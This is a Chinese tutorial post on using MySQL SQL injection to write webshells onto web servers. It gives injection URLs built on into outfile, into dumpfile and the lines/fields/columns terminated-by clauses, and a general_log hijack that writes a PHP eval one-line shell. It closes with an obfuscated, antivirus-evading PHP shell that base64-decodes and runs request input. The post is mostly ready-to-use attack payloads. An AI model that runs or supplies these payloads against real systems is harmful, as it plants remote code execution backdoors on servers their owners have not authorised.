2. 程式人生 > 實用技巧 >sql注入之檔案寫入into outfile

sql注入之檔案寫入into outfile

阿新 發佈:2020-12-13

sql注入中寫入webshell的幾種方式

sql注入中寫入webshell的幾種方式

  1. secure_file_priv="c:/…"被註釋掉或者是web路徑

  2. php.ini中的get_magic_quotes_gpc()函式未開啟

    其中secure_file_priv有三種情況

    1. 空,表示匯入匯出沒有任何限制
    2. 有指定路徑,比如("c:/xxx/xxx"):只能向指定路徑匯入匯出檔案
    3. null,禁止匯入匯出

    在進行寫入websell時,要注意引數secure_file_priv是否有指定路徑或者是否為null。最好要獲得root許可權

    0x01

Union select後寫入

  1. union select+into outfile
  • ?id=1')) union select 1,2, "" into outfile "D:/Phpstudy/PHPTutorial/test1.php

Ps:目錄分隔符要用斜槓(/)

  1. union select+into dumpfile

outfile與dumpfile有一定的區別
eg:假設有一個二進位制檔案,如果用outfile匯入,則在匯出過程中會被轉義從而被破壞,這是隻能使用dumpfile函式

Into dumpfile函式不會對任何列行進行終止,也不會執行轉義處理

0x02

Lines terminated by

?id=1' into outfile 'D:\Phpstudy\PHPTutorial\WWW\num.php' lines terminated by ''--+

注入原理:select 語句查詢的內容寫入檔案,Lines terminated by語句拼接webshell。

可以理解為:以每行終止的位置新增xx內容

0x03

Lines starting by

?id=1' into outfile 'D:\Phpstudy\PHPTutorial\WWW\num2.php' lines starting by ''--+

Lines starting by 以每行開始的位置新增xx內容

0x04

Fields terminated by

?id=1' into outfile 'D:\Phpstudy\PHPTutorial\WWW\num3.php' fields terminated by ''--+

Fields terminated by 每個欄位的間隔中插入xx內容

0x05

Columns terminated by

?id=1' into outfile 'D:\Phpstudy\PHPTutorial\WWW\num4.php' columns terminated by ''--+

Columns terminated by 每個欄位的位置新增xx內容

0x06

利用log寫入

當無法使用select into outfile寫入一句話時,可以通過修改mysql的log檔案getshell
(必須獲得mysql的root許可權)

show variables like '%general%';             #檢視配置
set global general_log = on;                 #開啟general log模式
set global general_log_file = 'E:/study/WWW/evil.php'; #設定日誌目錄為shell地址
select '<?php eval($_GET[g]);?>'             #寫入shell
set global general_log=off;                  #關閉general log模式

流程:
1.開啟general log模式

2.修改log根地址

3.寫入shell

開啟general log模式後,只要是對mysql進行操作的語句都會在log中有記錄,修改log根地址後,寫入一句話shell就可以利用相對路徑

附:

sql查詢免殺shell語句
SELECT “<?php $p = array(‘f’=>’a’,’pffff’=>’s’,’e’=>’fffff’,’lfaaaa’=>’r’,’nnnnn’=>’t’);$a = array_keys($p);$_=$p[‘pffff’].$p[‘pffff’].$a[2];$_= ‘a’.$_.’rt';$_(base64_decode($_REQUEST[‘username’]));?>”

相關推薦

sql注入檔案寫入into outfile

sql注入寫入webshell的幾種方式 sql注入寫入webshell的幾種方式 secure_file_priv=\"c:/…\"被註釋掉或者是web路徑

sql注入檔案的讀寫------上傳一句話木馬

             sql注入檔案的讀寫 一、mysql讀寫檔案的基本條件 1、資料庫允許讀寫檔案

SQL注入匯出匯入檔案

最近在學習SQL注入的東西,在Less-9的時候看到一個匯入匯出檔案獲取flag的注入姿勢,在這裡記錄一下

sql注入報錯注入

1.updatexml()函式 updatexml(xml_target, xpath_expr, new_xml)接受三個引數,此函式將xml標記的給定片段的單個部分xml_target替換為新的new_xml,然後返回更改後的xml。如果xpath寫入錯誤格式,就會報錯,並且返

SQL注入DVWA平臺測試mysql注入

今天主要針對mysql常用注入語句進行測試。測試環境與工具:測試平臺:DVWA,下載地址:http://down.51cto.com/data/875088,也可下載metaspolit-table2虛擬機器,裡面已經部署好了dvwa.。***工具:burpsui

CTF基本:SQL注入get引數注入(附靶機下載連結永久有效)

靶機地址: 連結:https://pan.baidu.com/s/1MhYXwhaJ8u08-b-6fg4lXg 提取碼:8520 準備環境:

SQL注入布林盲註腳本

在做ctf時,我們會碰到很多的SQL注入的題目,可能會有各種各樣的過濾,有時候sqlmap會無法滿足我們的需求,無法繞過各種各樣的注入,所以我們需要手寫盲註腳本來對注入點進行注入,自己寫指令碼的好處就是我們可以根

sql注入union注入

聯合查詢注入利用的前提: 必須要有回顯 聯合查詢過程: 判斷是否存在注入

初學SQL 注入常見的幾種注入型別

技術標籤:日常操作sql資訊保安安全web SQL注入原理 老生常談,SQL注入攻擊的本質就是把使用者輸入的引數當做SQL語句來執行,Web應用程式對使用者輸入資料的合法性沒有判斷和過濾,攻擊者可以通過構造不同的SQL

SQL注入二次注入sql-lab第24關)

什麼是二次注入 二次注入可以理解為,攻擊者構造的惡意資料儲存在資料庫後,惡意資料被讀取並進入到SQL查詢語句所導致的注入。防禦者可能在使用者 輸入惡意資料時對其中的特殊字元進行了轉義處理,但在惡意資

#SQL注入整型注入流程#小白型|淺用

SQL注入:網站相信使用者傳入的資訊,導致執行含有命令的語句,雖然會過濾傳輸資訊,但是我們~咳咳  道高一尺魔高一丈嘛,

SQL注入堆疊注入(堆查詢注入

Stached injection -- 堆疊注入 0x00 堆疊注入的定義 ​ Stackedinjection 漢語翻譯過來後,稱為堆查詢注入,也有稱之為堆疊注入。堆疊注入為攻擊者提供了很多的攻擊手段,通過新增一個新的查詢或者終止查詢,可以達

十三:SQL注入MYSQL注入

MYSQL注入中首先要明確當前注入點許可權,高許可權注入時有更多的攻擊手法,有的能直接進行getshell操作,其中也會遇到很多的阻礙,相關防禦手法也要明確,所謂知己知彼,百戰不殆。作為安全開發工作者,攻防兼備。

十六:SQL注入查詢方式及報錯盲注

在很多注入時,有很多注入會出現無回顯的情況,其中不回顯的原因可能是SQL查詢語句有問題,這時候我們需要用到相關的報錯或者盲注進行後續操作,同時作為手工注入的時候,需要提前瞭解SQL語句能更好的選擇對應的注

sql注入Mysql資料庫(二)

1.前言 前面述說了Mysql滲透時用的基礎知識後,本章內容述說Mysql注入時所用的語法知識

SQL注入數字型注入(手工)(1)

產生注入漏洞條件 引數使用者可控:前端傳給後端的引數內容是可以被使用者控制的

SQL注入高許可權注入

SQL注入之高許可權注入 簡介 在常規WEB網站架構中可能存在不同的網站對應不同的資料庫不同的管理使用者,不同的使用者擁有對資料庫不同的操作許可權,因此獲取高許可權使用者可以幫助我們更好的進行測試

sql注入查詢方式及報錯注入

當進行sql注入時,有很多注入會出無回顯的情況,其中不回顯的原因可能是sql語句查詢方式的問題導致的,這個時候我們需要用到相關的報錯或盲注進行後續操作,同時作為手工注入時,提前瞭解或預知器sqkl語句大概寫法也

若依(Ruoyi)管理系統後臺sql注入+任意檔案下載漏洞

0x00若依介紹 若依可以用於所有的Web應用程式,如網站管理後臺,網站會員中心,CMS,CRM,OA。所有前端後臺程式碼封裝過後十分精簡易上手,出錯概率低。同時支援移動客戶端訪問。系統會陸續更新一些實用功能。寓意

Sql注入簡要注入

知識點: 1.在mysql5.0以上版本中,mysq1存在一個自帶資料庫名為 information_schema, 它是一個儲存記錄所有資料庫名, 表名,列名的資料庫,